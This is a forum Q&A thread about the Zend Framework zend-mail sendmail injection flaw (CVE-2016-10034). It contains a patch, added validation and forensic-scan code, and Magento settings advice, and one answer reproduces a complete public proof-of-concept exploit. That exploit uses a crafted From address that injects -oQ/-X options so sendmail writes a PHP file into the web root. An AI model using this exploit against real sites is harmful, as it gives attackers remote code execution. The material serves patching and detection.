Asked 14 Jan 2017 (7 years ago), 1877 views

shabi posted:
Zend Framework Security Vulnerability


Zend Framework has a serious vulnerability which can lead to a remote code execution attack on your system if your server uses Sendmail as a mail transport agent.

Is this Zend Framework vulnerability a serious issue? And if yes, how can one solve the Zend Framework vulnerability?
SwiftMailer, ZendMail and PhpMailer are affected by a vulnerability in which the execution of a remote command is possible, which is a good attraction for hackers. - jagdish
Jan 14 '17 04:48
A hacker injects code into the sendmail command by setting the From email like $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; - Rasi
Jan 16 '17 03:52
Mitul Dabhi answered:

Solution: the filter checks for the sequence \" in the local part of the email From address.

$from = $headers->get('From');
if ($from) {
    foreach ($from->getAddressList() as $address) {
        if (preg_match('/\\\"/', $address->getEmail())) {
            throw new Exception\RuntimeException("Potential code injection in From header");
        }
    }
}


Check more detail here.
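As an added example (not code from the thread or from the zend-mail project), here is the same \" check written as a standalone function, together with a stricter allow-list validation a defender can run on form input before it ever reaches a mail transport. It is run over constructed sample addresses, including the injection string quoted in the comments above; function names are hypothetical.

```php
<?php
// Added example, not from the thread or the zend-mail project.
// Function names (containsEscapedQuote, isAcceptableFromAddress,
// rejectedFromAddresses) are hypothetical.

declare(strict_types=1);

/**
 * Mirror of the zend-mail patch quoted above: refuse any address that
 * contains the two-character sequence \" (backslash, double quote),
 * the sequence that breaks out of the quoted string once the address
 * is turned into a sendmail command-line parameter. The patch checks
 * the local part; checking the whole address is equivalent for a
 * valid address and strictly safer for an invalid one.
 */
function containsEscapedQuote(string $email): bool
{
    return preg_match('/\\\"/', $email) === 1;
}

/**
 * Stricter allow-list check applied on top of the patch: the address
 * must pass PHP's e-mail validator, and the local part may only use
 * the unquoted "atext" characters, so quotes, spaces and backslashes
 * are never accepted. A leading '-' is refused as well, so the value
 * can never read as an option if it is ever placed on a command line.
 */
function isAcceptableFromAddress(string $email): bool
{
    if (containsEscapedQuote($email)) {
        return false;
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $localPart = substr($email, 0, (int) strrpos($email, '@'));
    return preg_match('/^[A-Za-z0-9.!#$%&\'*+\/=?^_`{|}~-]+$/', $localPart) === 1
        && $localPart[0] !== '-';
}

/**
 * Validate every From address and return the ones that were refused,
 * so the caller can throw and write a log line recording the attempt.
 */
function rejectedFromAddresses(array $emails): array
{
    $rejected = [];
    foreach ($emails as $email) {
        if (!isAcceptableFromAddress($email)) {
            $rejected[] = $email;
        }
    }
    return $rejected;
}

// Constructed sample input: a legitimate address, the injection string
// quoted in the thread, and a quoted local part that is syntactically
// legal but still refused by the allow-list.
$samples = [
    'alice@example.com',
    '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com',
    '"john doe"@example.com',
];

foreach ($samples as $s) {
    printf("%-66s %s\n", $s, isAcceptableFromAddress($s) ? 'accepted' : 'REJECTED');
}

foreach (rejectedFromAddresses($samples) as $bad) {
    error_log('Rejected From address in contact form: ' . $bad);
}
```

The first function alone is what closes the injection; the second is the defence-in-depth a contact form should apply anyway, because nothing in the form needs quoted local parts, and logging the rejected value gives you a detection signal for attempts against an already patched site.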
jagdish answered:

The following code is used to obtain remote code execution through zendMailer:

<?php
 
/*
 
Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 

Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------
 
// mail() param injection via the vulnerability in zend-mail


chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);

?>
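The PoC comment above describes the artifact this attack leaves behind: a sendmail -X transfer log, written as a .php file into a web-served directory, whose lines have the form "09607 <<< ...". As an added example (not code from the thread or from the PoC's author), here is a small forensic scan that looks for exactly that artifact under a web root. It builds a constructed sample tree in a temporary directory and scans it; function and file names are hypothetical.

```php
<?php
// Added example, not from the thread or the PoC author. Function names
// (looksLikeSendmailTraceWithPhp, findSuspiciousTraceFiles) and the
// sample tree are constructed for this demonstration.

declare(strict_types=1);

/**
 * A sendmail -X trace file consists of lines such as
 *   09607 <<< Content-Type: text/html; charset=us-ascii
 * i.e. a process id, "<<<" or ">>>", and the raw message line.
 * Report a file when it has that shape and also carries a PHP open tag,
 * which is the combination a legitimate file in a web root never has.
 */
function looksLikeSendmailTraceWithPhp(string $path): bool
{
    // Only the first 64 KiB is needed to recognise the trace format.
    $content = @file_get_contents($path, false, null, 0, 65536);
    if ($content === false) {
        return false;
    }
    $isTrace = preg_match('/^\d+ (<<<|>>>) /m', $content) === 1;
    $hasPhp  = stripos($content, '<?php') !== false;
    return $isTrace && $hasPhp;
}

/**
 * Walk a web root recursively and return the sorted paths of files that
 * look like a sendmail trace log carrying PHP code.
 */
function findSuspiciousTraceFiles(string $webRoot): array
{
    $hits = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($webRoot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        if ($file->isFile() && looksLikeSendmailTraceWithPhp($file->getPathname())) {
            $hits[] = $file->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

// Constructed sample tree: one benign PHP file and one file shaped like
// the trace output quoted in the PoC comment above.
$root = sys_get_temp_dir() . '/zf-scan-' . getmypid();
mkdir("$root/cache", 0700, true);
file_put_contents("$root/index.php", "<?php echo 'hello'; ?>\n");
file_put_contents(
    "$root/cache/phpcode.php",
    "09607 <<< Content-Type: text/html; charset=us-ascii\n"
    . "09607 <<< \n"
    . "09607 <<< <?php phpinfo(); ?>\n"
);

foreach (findSuspiciousTraceFiles($root) as $hit) {
    echo "suspicious sendmail trace in web root: $hit\n";
}
```

Run against a real document root this only finds the one artifact the PoC produces; the broader incident-response step is still to patch zend-mail, find any PHP file in a web-writable directory that the deployment did not ship, and review the web server access log for requests to it.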
Rasi answered:

To protect your site from this vulnerability, you should immediately check your mail sending settings. Go to the system settings used to control the “Reply to” address for emails sent from your Magento store:

Magento 1: System-> Configuration-> Advanced-> System-> Mail Sending Settings-> Set Return-Path

Magento 2: Stores-> Configuration-> Advanced-> System-> Mail Sending Settings-> Set Return-Path

If “Set Return-Path” is set to “Yes” and your server uses Sendmail, then your store is vulnerable to this exploit.